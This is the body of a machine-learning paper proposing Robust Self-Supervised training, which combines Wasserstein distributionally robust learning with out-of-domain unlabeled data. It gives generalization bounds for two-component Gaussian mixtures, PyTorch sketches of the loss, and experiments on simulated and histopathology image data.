One of the challenges in adversarially robust learning is the substantial difficulty of increasing the robust accuracy compared to achieving high accuracy in non-robust scenarios (Carlini & Wagner, 2017). A study by Schmidt et al. (2018) posited that this challenge arises from the larger sample complexity associated with learning robust classifiers in general. Specifically, they presented a simple model where a good classifier with high standard (non-robust) accuracy can be achieved using only a single sample, while a significantly larger training set is needed to attain a classifier with high robust accuracy. Recent works (Carmon et al., 2019; Zhai et al., 2019; Alayrac et al., 2019) demonstrated that the gap in sample complexity between robust and standard learning, as outlined by Schmidt et al. (2018) in the context of a two-component Gaussian mixture model, can be bridged with the inclusion of unlabeled samples. Essentially, unlabeled samples can be harnessed to mitigate classification errors even when test samples are perturbed by an adversary. Another study by Najafi et al.
(2019) achieved a similar result using a different definition of adversarial robustness and a more comprehensive data generation model. Their approach involves the use of 'self-training' to assign soft/hard labels to unlabeled data, in contrast to our approach, where unlabeled data is exclusively utilized to constrain the set of classifiers, aiming to avoid crowded regions. While DRO serves as a tool in our approach, it is not necessarily the primary objective. In Deng et al. (2021), the authors showed that, in the setting of Schmidt et al. (2018), out-of-domain unlabeled samples improve adversarial robustness.

Theoretical analysis of Semi-Supervised Learning (SSL) under the so-called cluster assumption has been a long-studied task (Rigollet, 2007). However, beyond Najafi et al. (2019), several recent methods leveraging DRO for semi-supervised learning have emerged (Blanchet & Kang, 2020; Frogner et al., 2021). Notably, Frogner et al. (2021) shares similarities with Najafi et al. (2019); however, instead of assigning artificial labels to unlabeled samples, Frogner et al. (2021) employs them to delimit the ambiguity set and enhance understanding of the marginals. Our work primarily focuses on the robustness aspect of the problem rather than advancing the general SSL paradigm.

Defense mechanisms against adversarial attacks usually consider two types of adversaries: i) point-wise attacks, similar to Miyato et al. (2018); Nguyen et al. (2015); Szegedy et al. (2013), and ii) distributional attacks (Staib & Jegelka, 2017; Shafieezadeh Abadeh et al., 2015; Mohajerin Esfahani & Kuhn, 2018), where in the case of the latter the adversary can change the distribution of data up to a predefined budget. It has been shown that Distributionally Robust Learning (DRL) achieves superior robustness compared to point-wise methods (Staib & Jegelka, 2017). Namkoong & Duchi (2017) utilized DRL in order to achieve a balance between the bias and variance of the classifier's error, leading to faster rates of convergence compared to empirical risk minimization even in the non-robust case. In DRL, the learner typically aims to minimize the loss while allowing the data distribution to vary within an uncertainty neighborhood. The central idea used by Namkoong & Duchi (2017) was to regulate the diameter of this uncertainty neighborhood based on the number of samples. Gao (2022) achieved similar results in DRL while utilizing the Wasserstein metric to define the perturbation budget for the data distribution. Based on the above arguments, we have also utilized DRL as the main tool in developing our proposed framework.

1.2 Main Contributions

We introduce a novel integration of DRO and Semi-Supervised Learning (SSL), leveraging out-of-domain unlabeled samples to enhance the generalization bound of the learning problem. Specifically, we theoretically analyze our method in the setting where samples are generated from a Gaussian mixture model with two components, which is a common assumption in several theoretical analyses in this field. For example, a simpler format, where the two Gaussians are isotropic and well-separated, is the sole focus of many papers such as Schmidt et al. (2018), Carmon et al. (2019), and Alayrac et al. (2019). Some of our notable contributions and improvements over recent works in the field include:

(i) In Theorem 4.1, we present a non-asymptotic bound for adversarially robust learning, leveraging both labeled and unlabeled samples jointly. This result builds upon the work of Carmon et al. (2019) and Alayrac et al.
(2019), which focused on the effectiveness of unlabeled samples when a single labeled sample suffices to learn a non-robust linear classifier. However, these studies do not provide insights into the necessary number of unlabeled samples when multiple labeled samples are involved, particularly in scenarios where the underlying distribution exhibits limited separation between the two classes. Our theoretical bounds address and fill this crucial gap.

(ii) Theorem 4.2 introduces a novel non-asymptotic bound for integrating labeled and unlabeled samples in SSL. To underscore the significance of our findings, consider the following example: In the realizable setting, where positive and negative samples can be completely separated by a hyperplane in $\mathbb{R}^d$, the sample complexity of supervised learning for a linear binary classifier is known to be $O(d/\epsilon)$ (Mohri et al., 2018). However, in the non-realizable setting, this complexity escalates to $O(d/\epsilon^2)$ (Mohri et al., 2018). A pivotal question in learning theory revolves around how to approach the sample complexity of $O(d/\epsilon)$ in the non-realizable setting. Insights provided by Namkoong & Duchi (2017) delve into this inquiry. Notably, even with the awareness that the underlying distribution is a Gaussian mixture, the optimal sample complexity, as per Ashtiani et al. (2018), still exceeds $O(d/\epsilon^2)$. Our work demonstrates that in scenarios where the underlying distribution is a Gaussian mixture and we possess $m = O(d/\epsilon)$ labeled samples, coupled with $n = O(d/\epsilon^2)$ unlabeled samples (without knowledge of the underlying distribution), one can achieve an error rate lower than or equal to that of having access to $O(d/\epsilon^2)$ labeled samples.

(iii) We formalize the incorporation of out-of-domain unlabeled samples into the generalization bounds of both robust and non-robust classifiers in Theorems 4.1, 4.2, and 4.4. We contend that this represents a novel contribution to the field, with its closest counterpart being Deng et al. (2021). Notably, Deng et al. (2021) addresses a scenario where the underlying distribution is an isotropic Gaussian mixture with well-separated Gaussian components, while the separation of components is not a prerequisite for our results.

1.3 Notation and Definitions

Let us denote the feature space by $\mathcal{X} \subseteq \mathbb{R}^d$, and assume $\mathcal{H}$ is a class of binary classifiers parameterized by the parameter set $\Theta$: for each $\theta \in \Theta$, we have a classifier $h_\theta \in \mathcal{H}$, where $h_\theta : \mathcal{X} \rightarrow \{-1, 1\}$. Assume a positive function $\ell : (\mathcal{X} \times \{-1, 1\} \times \Theta) \rightarrow \mathbb{R}_{\geq 0}$ as the loss function. Also, let $P$ be the unknown data distribution over $\mathcal{X} \times \{-1, 1\}$, and let $S = \{(X_i, y_i)\}_{i=1}^m$ for $m \in \mathbb{N}$ be a set of i.i.d. samples drawn from $P$. Then, for all $\theta \in \Theta$, the true risk and the empirical risk of a classifier w.r.t. $P$ can be defined as follows:

$$R(\theta, P) = \mathbb{E}_P [\ell(X, y; \theta)], \quad R(\theta, \hat{P}_S^m) = \mathbb{E}_{\hat{P}_S^m} [\ell(X, y; \theta)] \triangleq \frac{1}{m} \sum_{i=1}^m \ell(X_i, y_i; \theta), \quad (1)$$

where $\hat{P}_S^m$ denotes an empirical estimate of $P$ based on the $m$ samples in $S$. We also need a way to measure the distance between various distributions that are supported over $\mathcal{X}$.
A well-known candidate for this goal is the Wasserstein distance (Definition A.1). Subsequently, we also define a Wasserstein ball in Definition A.2 in order to effectively constrain sets of probability measures. It should be noted that throughout this paper, the Wasserstein distance between any two distributions supported over $\mathcal{X} \times \{\pm 1\}$ is defined as the distance between their respective marginals on $\mathcal{X}$.

The ultimate goal of classical learning is to find the parameter $\theta^* \in \Theta$ such that, with high probability, $R(\theta^*)$ is sufficiently close to $\min_\theta R(\theta)$. A well-known approach to achieve this goal is the Empirical Risk Minimization (ERM) algorithm, formally defined as follows:

$$\hat{\theta}_{\text{ERM}}(S) \triangleq \arg\min_{\theta \in \Theta} \mathbb{E}_{\hat{P}_S^m}[\ell(\theta; X, y)] = \arg\min_{\theta \in \Theta} \frac{1}{m} \sum_{i=1}^{m} \ell(\theta; X_i, y_i). \quad (2)$$

A recent variant of ERM, which has gained huge popularity in both theory and practice, is the so-called Distributionally Robust Learning (DRL), formulated as follows:

**Definition 1.1 (Distributionally Robust Learning (DRL)).** DRL aims at training a classifier which is robust against adversarial attacks on the data distribution. In this regard, the learner attempts to find a classifier with a small robust risk, denoted by $R^{\text{robust}}_{\epsilon,c}(\theta, P)$ and defined as

$$R^{\text{robust}}_{\epsilon,c}(\theta, P) = \sup_{P' \in B_\epsilon(P)} R(\theta, P'), \quad (3)$$

for all $\theta \in \Theta$ and any $\epsilon \geq 0$. Therefore, DRL solves the following optimization problem:

$$\hat{\theta}_{\text{DRL}}^{\epsilon,c}(S) \triangleq \arg\min_{\theta \in \Theta} R_{\epsilon,c}^{\text{robust}}(\theta, \hat{P}_S^m). \quad (4)$$

Surprisingly, the sophisticated minimax optimization problem of equation 4, which takes place in a subset of the infinite-dimensional space of probability measures corresponding to the constraints, can be substantially simplified when re-written in its dual form:

**Lemma 1.2 (From Blanchet et al., 2019).** For a sufficiently small $\epsilon > 0$, the minimax optimization problem of equation 4 has the following dual form:

$$\inf_{\theta \in \Theta} \sup_{P' \in B_\epsilon(\hat{P}_S^m)} R(\theta, P') = \inf_{\gamma \geq 0} \left\{ \gamma \epsilon + \inf_{\theta \in \Theta} \frac{1}{m} \sum_{i=1}^{m} \sup_{Z \in \mathcal{X}} \left\{ \ell(Z, y_i; \theta) - \gamma c(Z, X_i) \right\} \right\}, \quad (5)$$

where $\gamma$ and $\epsilon$ are dual parameters, and there is a bijective and reciprocal relation between $\epsilon$ and $\gamma^*$, i.e., the optimal value which minimizes the r.h.s.

As suggested by Sinha et al. (2017), the $\inf_{\gamma \geq 0}$ on the r.h.s. of the above optimization problem can be removed by fixing a user-defined value for $\gamma$. This also means that if one attempts to find the optimal value for $\theta$, the additive term $\gamma \epsilon$ is ineffective and can be removed as well. It should be noted that this also fixes an (unknown) value for $\epsilon$. In practice, the appropriate value for $\epsilon$ is not known beforehand and thus can usually be found through a cross-validation stage, while the same procedure can be applied to its dual counterpart, i.e., $\gamma$. In other words, the above-mentioned strategy keeps the generality of the problem intact.
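To illustrate how the r.h.s. of equation 5 is typically handled in practice, the sketch below approximates the inner supremum by gradient ascent for a differentiable surrogate loss and the squared-Euclidean cost $c(Z, X) = \|Z - X\|_2^2$, mirroring the procedure of Sinha et al. (2017). This is a minimal sketch under those assumptions, not the exact routine used in our experiments; the step count and step size are illustrative.

```python
import torch

def robust_surrogate(loss_fn, x, y, gamma, steps=15, lr=0.1):
    """Approximate sup_Z { loss(Z, y) - gamma * ||Z - x||^2 } by gradient
    ascent over Z, then re-evaluate at the detached maximizer so that
    gradients w.r.t. the model parameters follow the envelope theorem."""
    z = x.clone().detach().requires_grad_(True)
    for _ in range(steps):
        obj = loss_fn(z, y).sum() - gamma * ((z - x) ** 2).sum()
        grad, = torch.autograd.grad(obj, z)
        z = (z + lr * grad).detach().requires_grad_(True)
    z_star = z.detach()
    # per-sample surrogate values; gradients flow only through loss_fn's parameters
    return loss_fn(z_star, y) - gamma * ((z_star - x) ** 2).sum(dim=-1)
```

Here `loss_fn(Z, y)` is any differentiable per-sample surrogate (e.g., the logistic loss of a linear classifier) that closes over the model parameters; the nonsmooth losses appearing in our analysis would be replaced by such a surrogate in practice.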
For the sake of simplicity, throughout the rest of the paper we work with the dual formulation in equation 5 and let $\gamma$ be a fixed, arbitrary value.

2 PROBLEM DEFINITION

At this point, we can formally define our problem. Let $\mathcal{X} \subseteq \mathbb{R}^d$, and let $P_0$ be an unknown and arbitrary distribution supported on $\mathcal{X} \times \{\pm 1\}$, i.e., $P_0$ produces feature-label pairs. For a valid cost function $c : \mathcal{X}^2 \to \mathbb{R}_{\geq 0}$, let $P_1$ represent a shifted version of $P_0$ such that the marginal distributions of $P_0$ and $P_1$ on $\mathcal{X}$ satisfy $W_c(P_{0,X}, P_{1,X}) = \alpha$ for some $\alpha > 0$. No assumption on $P_1(y|X)$ is necessary in this work. Here, the subscript $X$ denotes the marginal distribution on $\mathcal{X}$. Let us consider the following two sets of samples:

$$S_0 = \{(X_i, y_i)\}_{i=1}^{m} \sim P_0^m, \quad S_1 = \{X'_j\}_{j=1}^{n} \sim P_{1,X}^n,$$

where $S_0$ indicates the labeled set and $S_1$ represents the unlabeled out-of-domain data. A classical result from VC-theory states that the generalization gap in learning from only $S_0$ can (with high probability) be bounded as

$$R(\hat{\theta}_{\text{ERM}}, P_0) \leq \min_{\theta \in \Theta} R(\theta, P_0) + O\left(\sqrt{\text{VCdim}(\mathcal{H})/m}\right) + \sqrt{O(1)/m}, \quad (6)$$

where $\text{VCdim}(\mathcal{H})$ denotes the VC-dimension of the hypothesis class $\mathcal{H}$ (Mohri et al., 2018). This bound can be prohibitively large when $\text{VCdim}(\mathcal{H})$ grows uncontrollably, e.g., for linear classifiers in very high dimensions ($d \gg 1$). We aim to propose a general framework that leverages both $S_0$ and $S_1$ concurrently and outputs (in polynomial time) an estimator, denoted by $\hat{\theta}^{\text{RSS}}$, such that the second term on the r.h.s. of equation 6 decays faster as one increases both $m$ and $n$. We are especially interested in cases where $n \gg m$.

In the next step, we apply our method to a simplified theoretical example in order to give explicit bounds. Similar to Schmidt et al. (2018); Carmon et al. (2019); Zhai et al. (2019); Alayrac et al. (2019), we focus fully on the binary classification problem of a high-dimensional Gaussian mixture model with two components using linear classifiers. Mathematically speaking, for some $\sigma_0 > 0$ and $\mu_0 \in \mathbb{R}^d$, let $P_0$ be the feature-label joint distribution over $\mathbb{R}^d \times \{-1, 1\}$ as follows:

$$P_0(y = 1) = \frac{1}{2}, \quad P_0(X | y) = N(y\mu_0, \sigma_0^2 I). \quad (7)$$

Also, suppose a shifted version of $P_0$, denoted by $P_1$, with $P_{1,X} = (1/2)\sum_{u=\pm 1} N(u\mu_1, \sigma_1^2 I)$, where $\|\mu_0 - \mu_1\| \leq O(\alpha)$ and $|\sigma_1 - \sigma_0| \leq O(\alpha)$. Given the two sample sets $S_0$ and $S_1$ in this configuration, the problem is to estimate the optimal linear classifier which achieves the minimum error rate.

3 PROPOSED METHOD: ROBUST SELF-SUPERVISED (RSS) TRAINING

We propose a solution that combines two generally independent paradigms in machine learning: self-training (Grandvalet & Bengio, 2004; Amini & Gallinari, 2002) and distributionally robust learning as in equation 4. The essence of self-training is to use the currently learned model in order to induce artificial labels on the unlabeled data. Thus, for an unlabeled sample $X'_j$ and any given model parameter $\theta \in \Theta$, one can temporarily consider a pseudo-label given by $h_\theta(X'_j)$.
In this regard, the proposed solution, denoted by $\hat{\theta}^{\text{RSS}} = \hat{\theta}^{\text{RSS}}(S_0, S_1)$, can be defined as follows:

**Definition 3.1 (Robust Self-Supervised (RSS) Training).** The essence of RSS training is to add a penalty term to the robust version of the original ERM formulation, which is evaluated solely on the out-of-domain unlabeled samples in $S_1$. Mathematically speaking, for a cost function $c$ and parameter $\gamma \geq 0$, let us define the robust loss $\phi_\gamma : \mathcal{X} \times \{\pm 1\} \times \Theta \rightarrow \mathbb{R}$ as

$$\phi_\gamma(X, y; \theta) \triangleq \sup_{Z \in \mathcal{X}} \left\{ \ell(Z, y; \theta) - \gamma c(Z, X) \right\}. \quad (8)$$

In this regard, for a given set of parameters $\gamma, \gamma', \lambda \in \mathbb{R}_{\geq 0}$, the proposed RSS estimator is defined as

$$\hat{\theta}^{\text{RSS}} \triangleq \arg\min_{\theta \in \Theta} \left\{ \frac{1}{m} \sum_{i=1}^{m} \phi_\gamma(X_i, y_i; \theta) + \frac{\lambda}{n} \sum_{j=1}^{n} \phi_{\gamma'}(X'_j, h_\theta(X'_j); \theta) \right\}. \quad (9)$$

The proposed RSS loss in equation 9 comprises two main terms. The first term attempts to minimize the empirical robust risk over the labeled data in $S_0$, where an adversary can alter the distribution of samples within a Wasserstein radius characterized by $\gamma$. In the following sections, we show that $\gamma$ can become asymptotically large (i.e., the radius becomes infinitesimally small) as $m \rightarrow \infty$, similar to Gao (2022). In fact, a small (but non-zero) budget for the adversary can control the generalization. The second term acts only on the unlabeled data, which are artificially labeled by $h_\theta$. It can be shown that this term regularizes the classifier by forcing it to avoid crowded areas. The sensitivity of this regularization is controlled by both $\lambda$ and $\gamma'$.

---
1 Having a Wasserstein distance of $\alpha$ between two high-dimensional Gaussian distributions implies that both the mean vectors $\mu_0, \mu_1$ and the variances $\sigma_0, \sigma_1$ are within a fraction of at most $O(\alpha)$ of each other.

3.1 MODEL OPTIMIZATION: ALGORITHM AND THEORETICAL GUARANTEES

It can be shown that for a convex loss function $\ell$, a convex cost function $c$, and sufficiently large $\gamma$ and $\gamma'$ (i.e., sufficiently small Wasserstein radii), the optimization problem of equation 9 is convex and can be solved up to arbitrarily high precision in polynomial time. Moreover, if $\ell$ is not convex, e.g., when $\mathcal{H}$ is the set of all neural networks, a simple Stochastic Gradient Descent (SGD) algorithm is still guaranteed to reach at least a local minimum of equation 9. More specifically, equation 9 is a minimax optimization problem consisting of an inner maximization (formulated in equation 8) followed by an outer minimization. As long as the cost function $c$ is strictly convex and $\gamma$ or $\gamma'$ are chosen sufficiently large, the inner maximization problem of equation 8 becomes strictly concave (Najafi et al., 2019; Sinha et al., 2017). This property holds regardless of the convexity of $\ell$, which is of paramount importance since $\ell$ is not convex in most practical situations. On the other hand, the cost-function candidates for $c$ considered in this paper are $\|\cdot\|_2$ and $\|\cdot\|_1^2$, which are strictly convex. Hence, equation 8 can be optimally solved in polynomial time.
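Putting the pieces together, the following is a minimal, hypothetical sketch of evaluating the RSS objective of equation 9 for a linear classifier, reusing the `robust_surrogate` routine sketched after Lemma 1.2. Pseudo-labels $h_\theta(X'_j)$ are generated without gradients, and the softplus surrogate, dimensions, and hyper-parameter values are all illustrative assumptions rather than our tuned settings.

```python
import torch

def rss_loss(model, x_lab, y_lab, x_unlab, gamma, gamma_p, lam):
    """RSS objective (equation 9): robust loss on labeled data plus a robust
    self-supervised penalty on pseudo-labeled, out-of-domain unlabeled data."""
    def loss_fn(z, y):
        # differentiable surrogate for the 0-1 loss of a linear classifier
        return torch.nn.functional.softplus(-y * model(z).squeeze(-1))

    labeled_term = robust_surrogate(loss_fn, x_lab, y_lab, gamma).mean()

    with torch.no_grad():                      # pseudo-labels h_theta(X'_j)
        pseudo_y = torch.sign(model(x_unlab).squeeze(-1))
    unlabeled_term = robust_surrogate(loss_fn, x_unlab, pseudo_y, gamma_p).mean()

    return labeled_term + lam * unlabeled_term

# Illustrative usage with a linear classifier in R^d:
d = 20
model = torch.nn.Linear(d, 1, bias=False)
x_lab, y_lab = torch.randn(8, d), torch.sign(torch.randn(8))
x_unlab = torch.randn(64, d)
loss = rss_loss(model, x_lab, y_lab, x_unlab, gamma=10.0, gamma_p=10.0, lam=0.5)
loss.backward()                                # one SGD step would follow
```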
The outer minimization problem of equation 9 is also differentiable as long as $\ell$ is sufficiently smooth (again, convexity is not needed). This means the gradient of equation 9 exists and can be efficiently computed using the Envelope Theorem. Explicit bounds on the maximum number of steps of a simple SGD algorithm (with a mini-batch size of 1) needed to reach an $\varepsilon$-neighborhood of the global maximum of equation 8 and a local minimum of equation 9 are given by Sinha et al. (2017). Formulating the gradient of minimax loss functions such as equation 9 via the envelope theorem has been carried out, for example, in Najafi et al. (2019) and Sinha et al. (2017). We use the same gradient formulation for the numerical optimization of our model parameters in Section 5, where experimental results on real data using neural networks are reported. In the next section, we derive theoretical guarantees for $\hat{\theta}_{\text{RSS}}$ and show that it leads to improved generalization bounds when $n$ is sufficiently large and $\alpha$ is controlled.

4 THEORETICAL GUARANTEES AND GENERALIZATION BOUNDS

In this section, we discuss the theoretical aspects of the RSS training method, especially for the classification of a two-component Gaussian mixture model using linear classifiers, i.e., $\mathcal{H} \triangleq \{\operatorname{sign}(\langle\theta, \cdot\rangle) : \mathbb{R}^d \to \{\pm 1\} \mid \theta \in \mathbb{R}^d\}$. For the sake of simplicity in the results, let us define the loss function $\ell$ as the zero-one loss:
$$\ell(X, y; \theta) = \mathbb{1}\left(y\langle\theta, X\rangle \leq 0\right).$$ (10)
However, the extension of the theoretical guarantees in this work to other types of loss functions is straightforward. The following theorem shows that the proposed RSS estimator of equation 9 can potentially improve the generalization bound in a robust learning scenario.

**Theorem 4.1.** Consider the setup described in Section 2 for the sample generation process (GMM assumption), and the loss function defined in equation 10. Using RSS training with $m$ labeled and $n$ unlabeled samples in $S_0$ and $S_1$, respectively, and for any $\gamma, \delta > 0$, there exist $\lambda$ and $\gamma'$ which can be calculated solely based on input samples such that the following holds with probability at least $1 - \delta$:
$$\mathbb{E}_{P_0}[\phi_\gamma(X, y; \hat{\theta}_{\text{RSS}})] \leq \min_{\theta \in \Theta} \mathbb{E}_{P_0}[\phi_\gamma(X, y; \theta)] + O\left(\gamma \sqrt{\frac{2d}{m} \left(\alpha(\|\mu_0\|_2^2 + \sigma_0^2) + \sqrt{\frac{2d}{2n + m}} + \sqrt{\frac{2 \log(1/\delta)}{2n + m}}\right)}\right).$$ (11)

The proof, as well as the procedure for calculating $\lambda$ and $\gamma'$, can be found in Appendix B. Theorem 4.1 presents a generalization bound for the proposed estimator when one considers the robust loss under an adversarial budget, which is characterized by $\gamma$. Larger values of $\gamma$ correspond to smaller Wasserstein radii for the distributional adversary of equation 3. The residual term on the r.h.s. of equation 11 converges to zero at a faster rate compared to that of equation 6, provided $n$ is sufficiently large and $\alpha$ is sufficiently small. We derive explicit conditions for this event in Corollary 4.3. Before that, let us show that for fixed $m$, as one increases the number of unlabeled samples $n$, the non-robust excess risk of the RSS-trained classifier decreases as well:

**Theorem 4.2.** Consider the setting described in Theorem 4.1.
Then, the estimator $\hat{\theta}_{\text{RSS}}$ of equation 9, using respectively $m$ labeled and $n$ unlabeled samples, along with specific values of $\gamma$, $\gamma'$, and $\lambda$ which can be calculated solely from the input samples, satisfies the following non-robust generalization bound with probability at least $1 - \delta$:
$$R\left(\hat{\theta}_{\text{RSS}}, P_0\right) - \min_{\theta \in \Theta} R(\theta, P_0) \leq O\left(\frac{e^{-\frac{1}{4}\|\mu_0\|_2^2}}{\sqrt{2}\,\sigma_0\sqrt{2\pi}} \left( \left(\|\mu_1\|_2^2 + \sigma_1^2\right)\frac{2d\alpha}{m} + \frac{4d}{m} \sqrt{\frac{2d + 2\log \frac{1}{\delta}}{2n + m}} \right)^{1/4}\right) + \sqrt{\frac{2\log \frac{1}{\delta}}{m}}.$$ (12)

Again, the proof and the procedure for calculating $\gamma$, $\gamma'$, and $\lambda$ are discussed in Appendix B. Based on the previous results, the following corollary showcases a number of perhaps surprising non-asymptotic conditions under which our generalization bound becomes superior to conventional approaches.

**Corollary 4.3.** Consider the setting described in Theorem 4.2. Then, $\hat{\theta}_{\text{RSS}}$ of equation 9 with $m$ labeled and $n$ unlabeled samples has an advantage over traditional ERM if
$$\alpha \leq O\left(\frac{d}{m}\right), \quad n \geq \Omega\left(\frac{m^2}{d}\right).$$ (13)
Also, the following conditions are sufficient to make the minimum required $m$ (for a given error bound) independent of the dimension $d$:
$$\alpha \leq O\left(\frac{1}{d}\right), \quad n \geq \Omega\left(d^3\right).$$ (14)

The proof is given in the Appendix. Finally, Theorem 4.2 also implies that if unlabeled samples are drawn from the same distribution as the labeled ones, i.e., $\alpha = 0$, then the excess risk of RSS training satisfies the following inequality with probability at least $1 - \delta$:
$$R\left(\hat{\theta}_{\text{RSS}}, P_0\right) - \min_{\theta \in \Theta} R(\theta, P_0) \leq O\left(\left(\frac{d^3 \log \frac{1}{\delta}}{m^2 (2n + m)}\right)^{1/8} + \sqrt{\frac{\log \frac{1}{\delta}}{m}}\right),$$ (15)
which again shows the previously mentioned improvements when all samples are in-domain.

The assumption of an isotropic GMM with two components has already been studied in the literature (see Section 1). Next, we present a more general version of Theorem 4.2 where each Gaussian component can have a non-diagonal covariance matrix. Mathematically speaking, suppose that $P_0$ and $P_1$ are defined as follows:
$$P_0(y = 1) = \frac{1}{2}, \quad P_0(X | y) = N(y\mu_0, \Sigma_0), \quad P_{1,X} = \frac{1}{2}N(\mu_1, \Sigma_1) + \frac{1}{2}N(-\mu_1, \Sigma_1),$$ (16)
where $\|\mu_1 - \mu_0\| \leq O(\alpha)$, $\|\Sigma_1 - \Sigma_0\|_2 \leq O(\alpha)$, and $\|\mu_1\|_2 \geq \beta \lambda_{\max}(\Sigma_1)$. Assume a set of $m$ labeled samples $S_0 \sim P_0^m$, and a set of $n$ unlabeled samples $S_1 \sim P_{1,X}^n$.

**Theorem 4.4 (Generalization Bound for General Gaussian Mixture Models).** Consider the setting described in equation 16.
Using the algorithm of equation 9 with $m$ labeled and $n$ unlabeled samples, there exists a set of parameters $\gamma$, $\gamma'$, $\lambda$ for which the following holds with probability at least $1 - \delta$:
$$R\left(\hat{\theta}_{\text{RSS}}, P_0\right) - \min_{\theta \in \Theta} R(\theta, P_0) \leq O\left(e^{\vartheta^2} \left(\sqrt{\frac{\|\mu_1\|_2^2 + \text{Tr}(\Sigma_1)}{m}}\, C \alpha + \sqrt{\frac{\log \frac{1}{\delta}}{2n + m}}\, \frac{d\kappa_1 \kappa'_1}{\Delta(\Sigma_1)} \right)^{1/2} + \sqrt{\frac{\log \frac{1}{\delta}}{m}}\right),$$ (17)
where
$$\vartheta = \left|\mu_1^\top\Sigma_1^{-1}\mu_1 - \mu_0^\top\Sigma_0^{-1}\mu_0\right|, \quad C = \frac{\|\mu_0\|^2 + \lambda_{\min}(\Sigma_1)\|\mu_0\|_2}{\lambda_{\min}^2(\Sigma_1)},$$
$$\kappa_1 = \frac{\lambda_{\max}(\Sigma_1)}{\lambda_{\min}(\Sigma_1)}, \quad \kappa'_1 = \frac{\lambda_{\max}(\Sigma_1)}{\Delta(\Sigma_1)}, \quad \Delta(\Sigma_1) = \min\left\{\left|\lambda_i(\Sigma_1) - \lambda_j(\Sigma_1)\right| : \lambda_i(\Sigma_1) \neq \lambda_j(\Sigma_1)\right\},$$
and $\lambda_i(\Sigma)$ denotes the $i$th eigenvalue of $\Sigma$.

Table 1: Accuracy of the model trained on labeled datasets of sizes 10, 20, 40, and 10,000 with varying amounts of unlabeled data from the same distribution with $\alpha = 0$ (left), and from a different distribution with $\alpha = 0.5\|\mu_0\|_2$ (right).

| Labeled size | Acc | Unlabeled size | Acc | Labeled size | Acc | Unlabeled size | Acc |
|--------------|-----|----------------|-----|--------------|-----|----------------|-----|
| 10 | 0.59| 10 | 0.63| 10 | 0.59| 10 | 0.61|
| | | 100 | 0.66| | | 100 | 0.65|
| | | 1,000 | 0.79| | | 1,000 | 0.78|
| | | 10,000 | **0.82**| | | 10,000 | **0.81**|
| 20 | 0.62| 20 | 0.64| 20 | 0.62| 20 | 0.65|
| | | 200 | 0.69| | | 200 | 0.65|
| | | 2,000 | 0.80| | | 2,000 | 0.79|
| | | 10,000 | **0.82**| | | 10,000 | **0.80**|
| 40 | 0.65| 40 | 0.65| 40 | 0.65| 40 | 0.65|
| | | 400 | 0.71| | | 400 | 0.73|
| | | 4,000 | 0.81| | | 4,000 | 0.78|
| | | 10,000 | **0.82**| | | 10,000 | **0.80**|
| 10,000 | **0.83**| - | - | 10,000 | **0.83**| - | - |

The proof can be found in the Appendix. One important difference to note between Theorem 4.4 and Theorem 4.2 is the choice of $\gamma'$, which controls the adversarial budget for the unlabeled (and out-of-domain) part of the dataset. In the setting of Theorem 4.2, we prefer to choose $\gamma'$ as small as possible. In the setting of Theorem 4.4, however, we consider the eigenvectors and eigenvalues of $\Sigma_1$ and $\Sigma_0$, as well as the directions of $\mu_1$ and $\mu_0$, in order to find the optimal value for the adversarial budget. In fact, there are cases in which selecting a large $\gamma'$ (less freedom for the adversary) may actually be the optimal choice.

5 EXPERIMENTAL RESULTS

The effectiveness of the proposed method has been assessed through experiments on various datasets, including simulated data and real-world datasets of histopathology images. Each experiment is divided into two parts: i) cases in which both labeled and unlabeled data are sampled from the same distribution, and ii) scenarios where the unlabeled data differ in distribution from the labeled ones. First, let us specify the datasets used in our experiments:

1. **Simulated data** consists of binary-labeled data points with a dimension of $d = 200$, generated according to the setting described in Section 2.
2. **NCT-CRC-HE-100K** consists of 100,000 histopathology images of colon tissue (Kather et al., 2018).
The images have dimensions of $224 \times 224$ and were captured at 20x magnification. The dataset is labeled with 9 distinct classes.
3. **PatchCamelyon** is a widely used benchmark dataset for medical image analysis. It consists of a large collection of 327,680 color histopathology images of lymph node sections, each with dimensions $96 \times 96$. The dataset has binary labels for the presence/absence of metastatic tissue.

5.1 EXPERIMENTS ON SIMULATED DATA

To evaluate the effectiveness of our method on simulated data, we first find the optimal classifier using only labeled samples. Then, we apply our method with a varying number of unlabeled samples. The results (see Table 1) show that our proposed method achieves notable accuracy improvements over models trained only on labeled samples. Moreover, the results indicate that our method is more effective when labeled and unlabeled data come from the same distribution. However, it still demonstrates significant improvement even when the unlabeled samples undergo a distribution shift.

Table 2: Accuracy of the model trained on labeled data from the NCT-CRC-HE-100K dataset with varying amounts of unlabeled data from the same distribution (left), as well as when unlabeled samples come from a different distribution (PatchCamelyon dataset) (right).

| Labeled size | Acc | Unlabeled size | Acc | Labeled size | Acc | Unlabeled size | Acc |
|--------------|-----|----------------|-----|--------------|-----|----------------|-----|
| 48 | 0.65| 700 | 0.80| 25 | 0.78| 400 | 0.79|
| | | 2,000 | **0.82** | | | 2,000 | **0.81** |
| 240 | 0.77| 1,200 | 0.82| 50 | 0.82| 700 | 0.86|
| | | 4,000 | **0.83** | | | 3,000 | **0.87** |
| 1040 | 0.83| 10,000 | 0.89| 300 | 0.87| 2,000 | 0.89|
| | | 20,000 | **0.91** | | | 8,000 | **0.90** |
| 50,000 | **0.916** | - | - | 32,000 | **0.94** | - | - |

5.2 EXPERIMENTS ON HISTOPATHOLOGY DATA

The processing pipeline for the real-world dataset of histopathology images is based on a ResNet50 encoder pre-trained on ImageNet (Deng et al., 2009; He et al., 2016), which extracts and stores $1 \times 1024$ embeddings from the input images. These embeddings are then used to train a deep neural network with four hidden layers of size 2048 and one output layer for the class label, using LeakyReLU activations. The experimental results for this part are shown in Table 2. Under the "same distribution" setting, both labeled and unlabeled data are taken from the NCT-CRC-HE-100K dataset. The "different distributions" setting means that the labeled data come from the NCT-CRC-HE-100K dataset (labels are either "Normal" or "Tumor"), while the PatchCamelyon dataset is used for the unlabeled data. As a result, the final labeling is binary. The experimental results demonstrate that increasing the amount of unlabeled data leads to an improvement in accuracy in both the "same" and "different" distribution settings.

6 CONCLUSION

In this study, we address robust and non-robust classification with a limited labeled dataset and a larger collection of unlabeled samples, assuming a slight perturbation in the distribution of the unlabeled data. We present the first non-asymptotic tradeoff between labeled ($m$) and unlabeled ($n$) sample sizes when learning a two-component Gaussian mixture model. Our analysis reveals that when $n \geq \Omega(m^2/d)$, the generalization bound improves compared to using only labeled data, even when the unlabeled data points are slightly out-of-domain.
